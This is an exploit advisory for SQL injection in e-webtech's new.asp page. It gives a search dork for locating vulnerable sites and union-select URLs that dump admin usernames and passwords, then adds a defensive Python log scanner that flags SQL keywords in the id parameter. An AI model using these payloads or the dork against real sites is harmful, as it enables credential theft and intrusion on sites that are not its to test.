e-webtech - 'new.asp?id=' SQL Injection

EDB-ID: 12547
CVE: N/A
Author: protocol
Type: webapps
Platform: PHP
Date: 2010-05-10



************************************************************
** (new.asp?id=) SQL Injection Vulnerability
************************************************************
** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** Risk: high
** Title: (new.asp?id=) SQL Injection Vulnerability
** Dork: "Powerd by www.e-webtech.com"
************************************************************
** Discovered by: protocol
** From : algeria
** Contact : pre@live.fr
************************************************************
** Greets to :
** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N
************************************************************
** Exploit:
**
** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword
**
**
** Column: username | password & pw
**
**
** Control Panel: http://localhost.com/controlpanel/login.asp
**
** Example:
**
**
** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
**
**
************************************************************
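
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web server log lines for requests to new.asp or news.asp whose id parameter is not a plain integer. The log layout, the sample lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log (assumed layout: date time method path query client-ip status).
SAMPLE_LOG = """\
2010-05-11 09:14:02 GET /new.asp id=412 192.0.2.10 200
2010-05-11 09:14:40 GET /new.asp id=412+union+select+1,2,3+from+sometable 192.0.2.77 200
2010-05-11 09:15:03 GET /news.asp id=17%20UNION%20SELECT%201 192.0.2.77 500
2010-05-11 09:15:09 GET /controlpanel/login.asp - 192.0.2.77 200
2010-05-11 09:16:30 GET /new.asp id=abc 192.0.2.31 200
"""

WATCHED_PATHS = {"/new.asp", "/news.asp"}   # pages named in the advisory
PLAIN_INT = re.compile(r"[0-9]{1,10}")
SQL_WORDS = re.compile(r"\b(union|select|from)\b", re.IGNORECASE)


def classify_id(raw_query):
    """Classify the id parameter of a raw query string: 'ok', 'non-numeric' or 'sqli'."""
    # parse_qs URL-decodes values, so '+' and '%20' both become spaces.
    values = parse_qs(raw_query, keep_blank_values=True).get("id", [])
    verdict = "ok"
    for value in values:
        if PLAIN_INT.fullmatch(value):
            continue
        if SQL_WORDS.search(value):
            return "sqli"
        verdict = "non-numeric"
    return verdict


def scan(log_text):
    """Return (client_ip, path, verdict, status) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # not in the assumed layout
        _date, _time, _method, path, query, client_ip, status = fields
        if path.lower() not in WATCHED_PATHS:
            continue
        verdict = classify_id(query)
        if verdict != "ok":
            findings.append((client_ip, path, verdict, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A flagged request that returned status 200 deserves review first. The same integer-only rule belongs in the application itself, as server-side validation of id before the query is built.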